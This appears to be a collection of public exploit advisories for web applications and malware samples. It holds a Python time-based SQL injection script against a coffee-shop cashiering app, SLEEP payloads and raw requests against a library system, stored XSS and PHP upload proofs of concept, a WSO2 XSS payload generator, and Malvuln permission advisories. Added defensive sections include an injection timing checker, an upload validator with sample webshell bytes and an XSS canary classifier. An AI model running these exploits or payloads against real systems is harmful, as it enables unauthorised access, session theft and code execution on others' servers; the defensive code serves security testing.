<pre><code># Exploit Title: Coffee Shop Cashiering System - Authenticated Time Based Sql injection<br /># Date: 27-06-2022<br /># Exploit Author: syad<br /># Vendor Homepage: https://www.sourcecodester.com<br /># Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/cscs.zip<br /># Version: 1.0<br /># Tested on: Windows 10 + XAMPP 3.2.4<br /># CVE ID : N/A<br /><br /># Description<br /># The id parameter of the sales/view_details page (view_detail.php) is not validated before it reaches the<br /># SQL query, so an authenticated user can inject a MySQL sleep() and confirm time-based blind SQL injection.<br /><br /><br />import requests<br />import sys<br />import time<br /><br />s = requests.Session()<br /><br /># Traffic is routed through an intercepting proxy (Burp on 127.0.0.1:8080); set to None if no proxy is running<br />proxies = {"https": "https://127.0.0.1:8080", "http": "http://127.0.0.1:8080"}<br /><br /><br />def login_sql():<br />    # Default admin credentials shipped with the application<br />    target = "http://%s/cscs/classes/Login.php?f=login" % sys.argv[1]<br />    d = {<br />        "username": "admin",<br />        "password": "admin123"<br />    }<br />    r = s.post(target, data=d, allow_redirects=True, proxies=proxies)<br />    return "success" in r.text<br /><br /><br />def detect_sql():<br />    # A lone single quote breaks the query; MySQL's error text confirms the parameter is injectable<br />    target = "http://%s/cscs/admin/?page=sales/view_details&id=2'" % sys.argv[1]<br />    r = s.get(target, proxies=proxies)<br />    if "You have an error in your SQL syntax;" in r.text:<br />        print("[+] SQL Error Found !!")<br />        return True<br />    return False<br /><br /><br />def time_based_sql(delay=5):<br />    # Measure the round trip: the injection only worked if the response took at least `delay` seconds<br />    target = "http://%s/cscs/admin/?page=sales/view_details&id=2'+or+sleep(%d)--+-" % (sys.argv[1], delay)<br />    start = time.monotonic()<br />    s.get(target, proxies=proxies)<br />    elapsed = time.monotonic() - start<br />    if elapsed >= delay:<br />        print("[+] Time Based SQL Injection Executed !!! (response took %.1f s)" % elapsed)<br />        return True<br />    print("[-] No delay observed (response took %.1f s)" % elapsed)<br />    return False<br /><br /><br />def main():<br />    if len(sys.argv) != 2:<br />        print("(+) usage: %s <target>" % sys.argv[0])<br />        print("(+) eg: %s 192.168.121.103" % sys.argv[0])<br />        sys.exit(-1)<br /><br />    if login_sql():<br />        print("[+] Success Login")<br />    else:<br />        print("[-] Login failed, check the credentials")<br />        sys.exit(1)<br /><br />    detect_sql()<br />    time_based_sql()<br /><br /><br />if __name__ == "__main__":<br />    main()<br /></code></pre>
<pre><code>#### Title: Library Management System with QR code Attendance 1.0 SQL Injection<br />#### Author: Ashish Kumar (https://www.linkedin.com/in/ashish-kumar-0b65a3184)<br />#### Date: 27.06.2022<br />#### Vendor: https://www.sourcecodester.com/users/kingbhob02<br />#### Software: https://www.sourcecodester.com/php/15434/library-management-system-qr-code-attendance-and-auto-generate-library-card.html<br />#### Version: 1.0<br />#### Reference: https://github.com/CyberThoth/CVE/blob/main/CVE/Library%20Management%20System%20with%20QR%20code%20Attendance/Sql%20Injection/POC.md<br /><br />#### Description:<br />##### The application does not validate the data a user submits (type, length, expected values) and does not neutralise special characters, so the input is placed directly into the SQL statement and changes what the statement does. In Library Management System with QR code Attendance the "id" parameter of "librarian/bookdetails.php" is concatenated into the query unfiltered, which gives an authenticated user time-based blind SQL injection.<br /><br />#### Payload used:<br />`' AND (SELECT 9198 FROM (SELECT(SLEEP(5)))iqZA)-- PbtB`<br /><br />#### POC<br /><br />1. Log in to the CMS with the default admin account:<br /><br />Username: admin<br /><br />Password: admin<br /><br /><br />2. Open http://localhost/LMS/librarian/bookdetails.php?id=191<br /><br /><br />3. Replace the id value with the SLEEP(5) payload (`' AND (SELECT 9198 FROM (SELECT(SLEEP(5)))iqZA)-- PbtB`); when the injection works the response is delayed by about five seconds.<br /><br />4. `http://localhost:80/LMS/librarian/bookdetails.php?id=' AND (SELECT 9198 FROM (SELECT(SLEEP(5)))iqZA)-- PbtB`<br /><br /><br /><br />5. Raw request:<br />```<br />GET /LMS/librarian/bookdetails.php?id=%27%20AND%20(SELECT%209198%20FROM%20(SELECT(SLEEP(5)))iqZA)--%20PbtB HTTP/1.1<br />Host: localhost<br />sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"<br />sec-ch-ua-mobile: ?0<br />sec-ch-ua-platform: "Windows"<br />Upgrade-Insecure-Requests: 1<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9<br />Sec-Fetch-Site: none<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-User: ?1<br />Sec-Fetch-Dest: document<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-GB,en-US;q=0.9,en;q=0.8<br />Cookie: PHPSESSID=0r78mi76ub6k55p8mkce7f4pco<br />Connection: close<br />```<br /></code></pre>
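Both advisories above (cscs `sales/view_details&id=` and LMS `bookdetails.php?id=`) confirm the injection by watching a sleep(5) request take longer. The script below is an added example, not part of either advisory: it reuses their two payload shapes but first measures a timing baseline with benign requests, so a slow server or a proxy hop is not mistaken for a successful injection. The base URL, parameter name, session cookie and the `simulated_server()` stand-in are assumptions made for this example.

```python
"""Time-based blind SQL injection check with a timing baseline.

Added example, not part of the original advisories. It generalises the
sleep(5) probes used against cscs (view_details&id=) and LMS
(bookdetails.php?id=) into a reusable check: measure benign requests
several times, then the delay payload, and only report injection when
the extra latency is close to the requested sleep.
"""
import statistics
import sys
import time
import urllib.parse
import urllib.request
from typing import Callable

SLEEP_SECONDS = 5  # delay requested from the database; both PoCs use 5

# Payload shapes taken from the two advisories; {n} is the sleep duration.
PAYLOADS = {
    "or-sleep": "2' or sleep({n})-- -",
    "subselect-sleep": "' AND (SELECT 9198 FROM (SELECT(SLEEP({n})))iqZA)-- PbtB",
}


def build_url(base_url: str, param: str, value: str) -> str:
    """Append param=value (URL-encoded) to base_url, e.g. bookdetails.php?id=191."""
    sep = "&" if "?" in base_url else "?"
    return f"{base_url}{sep}{urllib.parse.urlencode({param: value})}"


def http_get(url: str, cookie: str = "") -> None:
    """Plain GET; both targets need a logged-in session, passed as the Cookie header."""
    headers = {"Cookie": cookie} if cookie else {}
    req = urllib.request.Request(url, headers=headers)
    with urllib.request.urlopen(req, timeout=SLEEP_SECONDS * 4) as resp:
        resp.read()


def timed(fetch: Callable[[str], None], url: str) -> float:
    """Run fetch(url) and return the elapsed wall-clock seconds."""
    start = time.monotonic()
    fetch(url)
    return time.monotonic() - start


def is_time_based_injectable(fetch, base_url, param, benign="2",
                             payload_key="or-sleep", sleep_seconds=SLEEP_SECONDS,
                             baseline_runs=3) -> bool:
    """True when the delayed request is at least 0.8 * sleep_seconds slower than baseline.

    The baseline is the median of several benign requests, so that one slow
    response (network jitter, a cold cache) neither masks nor fakes the signal.
    """
    baseline = statistics.median(
        timed(fetch, build_url(base_url, param, benign)) for _ in range(baseline_runs)
    )
    payload = PAYLOADS[payload_key].format(n=sleep_seconds)
    delayed = timed(fetch, build_url(base_url, param, payload))
    return delayed - baseline >= 0.8 * sleep_seconds


def simulated_server(delay: float) -> Callable[[str], None]:
    """Constructed offline stand-in for a vulnerable target: it sleeps when the
    URL-encoded sleep( call is present and returns immediately otherwise."""
    def fetch(url: str) -> None:
        if "sleep%28" in url.lower():
            time.sleep(delay)
    return fetch


if __name__ == "__main__":
    # e.g. python timing_check.py http://HOST/LMS/librarian/bookdetails.php id "PHPSESSID=..." subselect-sleep
    if len(sys.argv) < 3:
        sys.exit(f"usage: {sys.argv[0]} <base_url> <param> [cookie] [or-sleep|subselect-sleep]")
    cookie = sys.argv[3] if len(sys.argv) > 3 else ""
    key = sys.argv[4] if len(sys.argv) > 4 else "or-sleep"
    hit = is_time_based_injectable(lambda u: http_get(u, cookie), sys.argv[1], sys.argv[2], payload_key=key)
    print("[+] time-based injection confirmed" if hit else "[-] no delay observed")
```

The 0.8 factor leaves room for the database finishing slightly early or the baseline being noisy; for a payload such as `2' or sleep(5)` the delay can also be longer than five seconds, because MySQL evaluates the sleep once per row the query returns.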
<pre><code>#### Title: Library Management System with QR code Attendance 1.0 Stored Cross-Site Scripting<br />#### Author: Ashish Kumar (https://www.linkedin.com/in/ashish-kumar-0b65a3184)<br />#### Date: 27.06.2022<br />#### Vendor: https://www.sourcecodester.com/users/kingbhob02<br />#### Software: https://www.sourcecodester.com/php/15434/library-management-system-qr-code-attendance-and-auto-generate-library-card.html<br />#### Version: 1.0<br />#### Reference: https://github.com/CyberThoth/CVE/blob/main/CVE/Library%20Management%20System%20with%20QR%20code%20Attendance/Cross%20Site%20Scripting(Stored)/POC.md<br /><br />#### Description:<br />#### Library Management System with QR code Attendance is vulnerable to stored cross-site scripting on the admin profile edit page: the "Name" parameter posted to 'http://localhost/LMS/admin/edit_admin_details.php' is saved without sanitisation and rendered without output encoding.<br /><br />#### Impact:<br /> The injected script is stored with the admin profile and runs in the browser of every user who views a page that renders the Name field. The PoC payload only displays document.cookie; the same position can be used to send the session cookie to an attacker-controlled host.<br /><br />### POC<br /><br />```<br />POST /LMS/admin/edit_admin_details.php?id=admin HTTP/1.1<br />Host: localhost<br />Content-Length: 115<br />Cache-Control: max-age=0<br />sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"<br />sec-ch-ua-mobile: ?0<br />sec-ch-ua-platform: "Windows"<br />Upgrade-Insecure-Requests: 1<br />Origin: http://localhost<br />Content-Type: application/x-www-form-urlencoded<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-User: ?1<br />Sec-Fetch-Dest: document<br />Referer: http://localhost/LMS/admin/edit_admin_details.php<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-GB,en-US;q=0.9,en;q=0.8<br />Cookie: PHPSESSID=0r78mi76ub6k55p8mkce7f4pco<br />Connection: close<br /><br />Name=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&EmailId=admin%40gmail.com&MobNo=0&Password=admin&submit=<br />```<br /></code></pre>
<pre><code>#### Title: Library Management System with QR code Attendance 1.0 File Upload RCE<br />#### Author: Ashish Kumar (https://www.linkedin.com/in/ashish-kumar-0b65a3184)<br />#### Date: 27.06.2022<br />#### Vendor: https://www.sourcecodester.com/users/kingbhob02<br />#### Software: https://www.sourcecodester.com/php/15434/library-management-system-qr-code-attendance-and-auto-generate-library-card.html<br />#### Version: 1.0<br />#### Reference: https://github.com/CyberThoth/CVE/blob/main/CVE/Library%20Management%20System%20with%20QR%20code%20Attendance/File_Upload/POC.md<br />#### Description:<br />#### The library-card upload in LMS/card/index.php does not check the type, extension or content of the "image" file. The file is written to the web-served assets/uploads/ directory under its original file name (basename() only strips the directory part), so an attacker who can submit the form can upload a PHP webshell and execute it by requesting it from the web server, obtaining code execution with the web server's privileges.<br /><br />#### $uploaddir = 'assets/uploads/';<br />#### $uploadfile = $uploaddir . basename($_FILES['image']['name']);<br /><br />#### Payload used:<br />`<?php phpinfo();?>`<br /><br />### POC<br />```<br />POST /LMS/card/index.php HTTP/1.1<br />Host: localhost<br />Content-Length: 1056<br />Cache-Control: max-age=0<br />sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"<br />sec-ch-ua-mobile: ?0<br />sec-ch-ua-platform: "Windows"<br />Upgrade-Insecure-Requests: 1<br />Origin: http://localhost<br />Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryngJP5BxPA6UsA91O<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-User: ?1<br />Sec-Fetch-Dest: document<br />Referer: http://localhost/LMS/card/index.php<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-GB,en-US;q=0.9,en;q=0.8<br />Cookie: PHPSESSID=0r78mi76ub6k55p8mkce7f4pco<br />Connection: close<br /><br />------WebKitFormBoundaryngJP5BxPA6UsA91O<br />Content-Disposition: form-data; name="name"<br /><br />File_Upload<br />------WebKitFormBoundaryngJP5BxPA6UsA91O<br />Content-Disposition: form-data; name="grade"<br /><br />Computer Studies<br />------WebKitFormBoundaryngJP5BxPA6UsA91O<br />Content-Disposition: form-data; name="dob"<br /><br />Student<br />------WebKitFormBoundaryngJP5BxPA6UsA91O<br />Content-Disposition: form-data; name="address"<br /><br />Testing Testing<br />------WebKitFormBoundaryngJP5BxPA6UsA91O<br />Content-Disposition: form-data; name="email"<br /><br />ashish@cyberthoth.in<br />------WebKitFormBoundaryngJP5BxPA6UsA91O<br />Content-Disposition: form-data; name="exp_date"<br /><br />1990-02-11<br />------WebKitFormBoundaryngJP5BxPA6UsA91O<br />Content-Disposition: form-data; name="id_no"<br /><br />8529637<br />------WebKitFormBoundaryngJP5BxPA6UsA91O<br />Content-Disposition: form-data; name="phone"<br /><br />1212121212<br />------WebKitFormBoundaryngJP5BxPA6UsA91O<br />Content-Disposition: form-data; name="image"; filename="File_upload.php"<br />Content-Type: application/octet-stream<br /><br /><?php phpinfo();?><br />------WebKitFormBoundaryngJP5BxPA6UsA91O--<br />```<br /><br />#### Access below URL:<br />`http://localhost/LMS/card/assets/uploads/File_upload.php`<br /><br />![image](https://github.com/CyberThoth/CVE/blob/main/CVE/Library%20Management%20System%20with%20QR%20code%20Attendance/File_Upload/POC.png)<br /></code></pre>
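The handler quoted above stores `basename($_FILES['image']['name'])` under assets/uploads/ unchanged, which is why File_upload.php ends up executable on the web server. What follows is an added example, not the application's code: the same storage step written in Python with the checks that handler is missing (extension allowlist, magic-byte and content checks, a random stored name, exclusive create into a directory the web server does not execute from). The allowlist, the magic-byte table, the sample uploads and the `store_upload()` directory handling are assumptions for this example.

```python
"""Server-side upload validation for an image field like LMS/card/index.php's "image".

Added example, not the application's code. The original handler is PHP and
keeps the client-supplied file name; this version shows the checks it lacks.
The allowlist, magic-byte table and sample files are assumptions.
"""
import os
import secrets

# Extension allowlist with the leading bytes a genuine file of that type must have
MAGIC = {
    "png": (b"\x89PNG\r\n\x1a\n",),
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "gif": (b"GIF87a", b"GIF89a"),
}
SCRIPT_MARKERS = (b"<?php", b"<?=", b"<script")  # reject image/PHP polyglots outright


class UploadRejected(ValueError):
    """Raised for anything that is not a plain image with a matching extension."""


def safe_stored_name(original_name: str, content: bytes) -> str:
    """Validate the upload and return the random name it should be stored under.

    1. Keep only the last path component (PHP's basename() does this too, but
       also normalise Windows separators rather than relying on it alone).
    2. Require the last extension to be on the allowlist, case-insensitively.
       Because the stored name is random, a double extension such as
       shell.php.png never reaches disk as given, so Apache's multi-extension
       handling cannot turn it into PHP.
    3. Require the content to start with the magic bytes of the claimed type,
       and reject bodies that carry a PHP or script opening tag.
    """
    name = os.path.basename(original_name.replace("\\", "/"))
    if "." not in name:
        raise UploadRejected("no extension")
    ext = name.rsplit(".", 1)[1].lower()
    if ext not in MAGIC:
        raise UploadRejected(f"extension .{ext} not allowed")
    if not content.startswith(MAGIC[ext]):
        raise UploadRejected(f"content is not a {ext} file")
    if any(marker in content.lower() for marker in SCRIPT_MARKERS):
        raise UploadRejected("script tag inside image data")
    return f"{secrets.token_hex(16)}.{ext}"


def store_upload(upload_dir: str, original_name: str, content: bytes) -> str:
    """Write a validated upload into upload_dir and return its path.

    upload_dir should sit outside the web root, or be served with script
    execution disabled. The final path is re-checked to be inside upload_dir
    and created exclusively so an existing file is never overwritten.
    """
    stored = safe_stored_name(original_name, content)
    root = os.path.realpath(upload_dir)
    path = os.path.realpath(os.path.join(root, stored))
    if os.path.dirname(path) != root:
        raise UploadRejected("path escapes upload directory")
    with open(path, "xb") as fh:
        fh.write(content)
    return path


# Constructed sample uploads for the self-test below
WEBSHELL = ("File_upload.php", b"<?php phpinfo();?>")                   # the PoC upload
DOUBLE_EXT = ("../../shell.php.png", b"<?php system($_GET['c']); ?>")   # traversal + double extension
POLYGLOT_PNG = ("avatar.png", MAGIC["png"][0] + b"\x00" * 16 + b"<?php echo 1; ?>")
GOOD_PNG = ("Photo.PNG", MAGIC["png"][0] + b"\x00\x00\x00\x0dIHDR" + b"\x00" * 17)


def check(name_and_bytes):
    """Return the stored name, or the rejection reason as a string."""
    try:
        return safe_stored_name(*name_and_bytes)
    except UploadRejected as exc:
        return f"rejected: {exc}"


if __name__ == "__main__":
    for sample in (WEBSHELL, DOUBLE_EXT, POLYGLOT_PNG, GOOD_PNG):
        print(f"{sample[0]:<22} -> {check(sample)}")
```

`$_FILES['image']['type']` is deliberately not consulted: it is the client's Content-Type header (the PoC sends application/octet-stream) and proves nothing about the bytes. For a production handler, re-encoding the image with an image library after these checks removes embedded payloads as well.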
<pre><code># Exploit Title: WSO2 Management Console (Multiple Products) - Unauthenticated Reflected Cross-Site Scripting (XSS)<br /># Date: 21 Apr 2022<br /># Exploit Author: cxosmo<br /># Vendor Homepage: https://wso2.com<br /># Software Link: API Manager (https://wso2.com/api-manager/), Identity Server (https://wso2.com/identity-server/), Enterprise Integrator (https://wso2.com/integration/)<br /># Affected Version(s): API Manager 2.2.0, 2.5.0, 2.6.0, 3.0.0, 3.1.0, 3.2.0 and 4.0.0;<br />#   API Manager Analytics 2.2.0, 2.5.0, and 2.6.0;<br />#   API Microgateway 2.2.0;<br />#   Data Analytics Server 3.2.0;<br />#   Enterprise Integrator 6.2.0, 6.3.0, 6.4.0, 6.5.0, and 6.6.0;<br />#   IS as Key Manager 5.5.0, 5.6.0, 5.7.0, 5.9.0, and 5.10.0;<br />#   Identity Server 5.5.0, 5.6.0, 5.7.0, 5.9.0, 5.10.0, and 5.11.0;<br />#   Identity Server Analytics 5.5.0 and 5.6.0;<br />#   WSO2 Micro Integrator 1.0.0.<br /># Tested on: API Manager 4.0.0 (OS: Ubuntu 21.04; Browser: Chromium Version 99.0.4844.82)<br /># CVE: CVE-2022-29548<br /><br />import argparse<br />import logging<br />import urllib.parse<br /><br /># Global variables<br /># errorCode is reflected, unauthenticated, into the login page. The payload shape %27);...// is the sink:<br /># a single-quoted JavaScript string and call are closed with '), the attacker's call follows, and // hides the rest.<br />VULNERABLE_ENDPOINT = "/carbon/admin/login.jsp?loginStatus=false&errorCode="<br />DEFAULT_PAYLOAD = "alert(document.domain)"<br /><br /># Logging config<br />logging.basicConfig(level=logging.INFO, format="%(message)s")<br />log = logging.getLogger()<br /><br /><br />def generate_payload(url, custom_payload=False):<br />    """Build, log and return the PoC URL for the given base URL."""<br />    log.info(f"Generating payload for {url}...")<br />    js = custom_payload if custom_payload else DEFAULT_PAYLOAD<br />    poc = f"{url}{VULNERABLE_ENDPOINT}%27);{js}//"<br />    log.info(f"[+] GET-based reflected XSS payload: {poc}")<br />    return poc<br /><br /><br />def clean_url_input(url):<br />    """Reduce e.g. https://host:9443/carbon/ to https://host:9443."""<br />    if url.count("/") > 2:<br />        return f"{url.split('/')[0]}//{url.split('/')[2]}"<br />    return url<br /><br /><br />def check_payload(payload):<br />    """Reject characters the page HTML-entity encodes, otherwise return the URL-encoded payload."""<br />    encoded_characters = ['"', '<', '>']<br />    if any(character in payload for character in encoded_characters):<br />        log.info('Unsupported character(s) (", <, >) found in payload.')<br />        return False<br />    return urllib.parse.quote(payload)<br /><br /><br />if __name__ == "__main__":<br />    # Parse command line<br />    parser = argparse.ArgumentParser(formatter_class=argparse.RawDescriptionHelpFormatter)<br />    required_arguments = parser.add_argument_group('required arguments')<br />    required_arguments.add_argument("-t", "--target",<br />                                    help="Target address {protocol://host} of vulnerable WSO2 application (e.g. https://localhost:9443)",<br />                                    required=True, action="store")<br />    parser.add_argument("-p", "--payload",<br />                        help="Use custom JavaScript for generated payload (Some characters (\"<>) are HTML-entity encoded and therefore are unsupported). (Defaults to alert(document.domain))",<br />                        action="store", default=False)<br />    args = parser.parse_args()<br /><br />    # Clean user target input<br />    args.target = clean_url_input(args.target.lower())<br /><br />    # Check for unsupported characters in custom payload; URL-encode as required<br />    if args.payload:<br />        args.payload = check_payload(args.payload)<br />        if args.payload:<br />            generate_payload(args.target, args.payload)<br />    else:<br />        generate_payload(args.target)<br /></code></pre>
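The stored XSS in edit_admin_details.php and the WSO2 login.jsp reflection differ only in what the sink does to the input: the LMS echoes `<script>` back as a tag, while the WSO2 page entity-encodes `"`, `<` and `>` but leaves `'` alone inside a JavaScript string, which is why the published payload starts with `%27);` and avoids those three characters. The following is an added example, not taken from either advisory: submit a canary containing all four metacharacters, then walk the reflection to see which came back raw and whether the reflection sits inside a single-quoted `<script>` string. The canary format, `CANARY_PREFIX` and the sample responses are constructed for this example; the `<script>` sample imitates a single-quoted JavaScript sink and is not WSO2's actual markup.

```python
"""Classify how a canary is reflected in an HTML response.

Added example, not taken from either advisory. The canary, the prefix and
the SAMPLES below are constructed; the <script> sample imitates a
single-quoted JavaScript string sink and is not WSO2's real markup.
"""
import re

META = '<>"\''                 # the four characters a sink must encode or reject
CANARY_PREFIX = "c4n4ry"
CANARY = CANARY_PREFIX + META  # what you submit in the parameter under test

# Accepted encodings of each metacharacter (matched case-insensitively)
ENCODINGS = {
    "<": ("&lt;", "&#60;", "&#x3c;"),
    ">": ("&gt;", "&#62;", "&#x3e;"),
    '"': ("&quot;", "&#34;", "&#x22;"),
    "'": ("&#39;", "&#x27;", "&apos;"),
}


def surviving_metachars(body: str, prefix: str = CANARY_PREFIX):
    """Walk the reflected canary and return the set of metacharacters that came back raw.

    Returns None when the canary is absent. Walking the four characters in
    order (raw or encoded) avoids being fooled by quotes and brackets that
    belong to the surrounding markup, e.g. the closing quote of an attribute.
    """
    pos = body.find(prefix)
    if pos < 0:
        return None
    pos += len(prefix)
    raw = set()
    for ch in META:
        if body.startswith(ch, pos):
            raw.add(ch)
            pos += 1
            continue
        window = body[pos:pos + 8].lower()
        enc = next((e for e in ENCODINGS[ch] if window.startswith(e)), None)
        if enc is None:
            break  # character stripped or rewritten: the rest cannot be judged
        pos += len(enc)
    return raw


def inside_single_quoted_js_string(body: str, prefix: str = CANARY_PREFIX) -> bool:
    """True if the canary lands inside a <script> block between single quotes.

    An odd number of unescaped single quotes before the canary within the
    script text means it sits in a '...' literal, the situation %27); exploits.
    """
    for m in re.finditer(r"<script\b[^>]*>(.*?)</script>", body, re.I | re.S):
        script = m.group(1)
        at = script.find(prefix)
        if at < 0:
            continue
        quotes = len(re.findall(r"(?<!\\)'", script[:at]))
        return quotes % 2 == 1
    return False


def classify(body: str) -> str:
    raw = surviving_metachars(body)
    if raw is None:
        return "not reflected"
    if "<" in raw and ">" in raw:
        return "html-injection"        # tags survive: the LMS stored XSS shape
    if "'" in raw and inside_single_quoted_js_string(body):
        return "js-string-breakout"    # only ' survives inside a '...' literal: the WSO2 shape
    if raw:
        return "partial-encoding:" + "".join(sorted(raw))
    return "encoded"


# Constructed sample responses (not captured from either application)
SAMPLES = {
    "stored_name_unescaped": '<h4>Welcome c4n4ry<>"\'</h4>',
    "stored_name_escaped": "<h4>Welcome c4n4ry&lt;&gt;&quot;&#39;</h4>",
    "login_js_sink": "<script>showError('c4n4ry&lt;&gt;&quot;'');</script>",
    "unrelated_page": "<h4>Welcome admin</h4>",
}

if __name__ == "__main__":
    for name, body in SAMPLES.items():
        print(f"{name:<24} {classify(body)}")
```

For a stored sink such as the admin Name field, submit `CANARY` through the form and run `classify()` on the page that displays the profile; for a reflected one, put it in the parameter and classify the immediate response. A "js-string-breakout" verdict is exactly the condition under which the `check_payload()` restriction above applies: the JavaScript must be written without `"`, `<` or `>`.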
<pre><code>Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022<br />Original source: https://malvuln.com/advisory/1fd70e41918c3a75c634b1c234ec36fb.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Backdoor.Win32.InfecDoor.17.c<br />Vulnerability: Insecure Permissions<br />Description: The malware writes a ".420" settings file to the root of the C: drive with change (C) permission granted to the Authenticated Users group. Standard users can rename the file dropped by the malware to disable it, change its settings, or replace it with their own executable, then wait for a privileged user to log on to the infected machine to potentially escalate privileges.<br />Family: InfecDoor<br />Type: PE32<br />MD5: 1fd70e41918c3a75c634b1c234ec36fb<br />Vuln ID: MVID-2022-0614<br />Disclosure: 06/23/2022<br /><br />Exploit/PoC:<br />C:\>cacls Infector.420<br />C:\Infector.420 BUILTIN\Administrators:(ID)F<br /> NT AUTHORITY\SYSTEM:(ID)F<br /> BUILTIN\Users:(ID)R<br /> NT AUTHORITY\Authenticated Users:(ID)C<br /><br /><br />C:\>dir Infector.420<br /> Volume in drive C has no label.<br /><br /> Directory of C:\<br /><br />04/11/2022 03:29 AM 36 Infector.420<br /> 1 File(s) 36 bytes<br /> 0 Dir(s) 24,644,292,608 bytes free<br /><br />C:\>type Infector.420<br />[My_OVER_ALL_SETTINGS]<br />FirsTime=0<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. 
The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code>Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022<br />Original source: https://malvuln.com/advisory/20e438d84aa2828826d52540d80bf7f.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Trojan-Mailfinder.Win32.VB.p<br />Vulnerability: Insecure Permissions<br />Description: The malware writes a directory containing multiple PE files to the root of the C: drive with change (C) permission granted to the Authenticated Users group. Standard users can rename the executable dropped by the malware to disable it, or replace it with their own executable, then wait for a privileged user to log on to the infected machine to potentially escalate privileges.<br />Family: VB<br />Type: PE32<br />MD5: 20e438d84aa2828826d52540d80bf7fa<br />Vuln ID: MVID-2022-0616<br />Disclosure: 06/23/2022<br /><br />Exploit/PoC:<br />C:\>cacls IMB<br />C:\IMB BUILTIN\Administrators:(OI)(CI)(ID)F<br /> NT AUTHORITY\SYSTEM:(OI)(CI)(ID)F<br /> BUILTIN\Users:(OI)(CI)(ID)R<br /> NT AUTHORITY\Authenticated Users:(ID)C<br /> NT AUTHORITY\Authenticated Users:(OI)(CI)(IO)(ID)C<br /><br /><br />C:\>dir IMB<br /> Volume in drive C has no label.<br /><br /> Directory of C:\IMB<br /><br />09/12/2003 09:07 PM 140,288 comdlg32.ocx<br />06/16/2004 01:17 PM 282,624 IMB.exe<br />09/12/2003 09:07 PM 1,388,544 msvbvm60.dll<br />09/12/2003 09:07 PM 108,336 MSWINSCK.OCX<br />09/15/2003 05:16 PM 192 Readme.txt<br />10/04/2001 12:16 AM 147,483 scrrun.dll<br />10/04/2001 12:16 AM 17,920 stdole2.tlb<br />09/12/2003 09:07 PM 2,864 winsock.dll<br /> 8 File(s) 2,088,251 bytes<br /></code></pre>
<pre><code>Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022<br />Original source: https://malvuln.com/advisory/5a83f8b8c8a8b7a85b3ff632aa60e793.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Backdoor.Win32.Shark.btu<br />Vulnerability: Insecure Permissions<br />Description: The malware writes multiple PE files to the root of the C: drive with change (C) permission granted to the Authenticated Users group. Standard users can rename the executable dropped by the malware to disable it, or replace it with their own executable, then wait for a privileged user to log on to the infected machine to potentially escalate privileges.<br />Family: Shark<br />Type: PE32<br />MD5: 5a83f8b8c8a8b7a85b3ff632aa60e793<br />Vuln ID: MVID-2022-0615<br />Disclosure: 06/23/2022<br /><br /><br />Exploit/PoC:<br />C:\>cacls Fraps<br />C:\Fraps BUILTIN\Administrators:(OI)(CI)(ID)F<br /> NT AUTHORITY\SYSTEM:(OI)(CI)(ID)F<br /> BUILTIN\Users:(OI)(CI)(ID)R<br /> NT AUTHORITY\Authenticated Users:(ID)C<br /> NT AUTHORITY\Authenticated Users:(OI)(CI)(IO)(ID)C<br /><br /><br />C:\>dir Fraps<br /> Volume in drive C has no label.<br /><br /> Directory of C:\Fraps<br /><br />01/14/2008 08:12 AM 12,988 changes.txt<br />01/14/2008 08:51 AM 172,032 fraps.dll<br />01/14/2008 08:53 AM 913,064 fraps.exe<br />01/14/2008 08:51 AM 1,683,968 fraps64.dat<br />01/14/2008 08:51 AM 111,616 fraps64.dll<br />01/14/2008 08:51 AM 135,168 frapslcd.dll<br />05/12/2022 02:02 AM DIR HELP<br />01/14/2008 08:07 AM 1,841 README.HTM<br />05/12/2022 02:02 AM 34,552 uninstall.exe<br /> 8 File(s) 3,065,229 bytes<br /></code></pre>
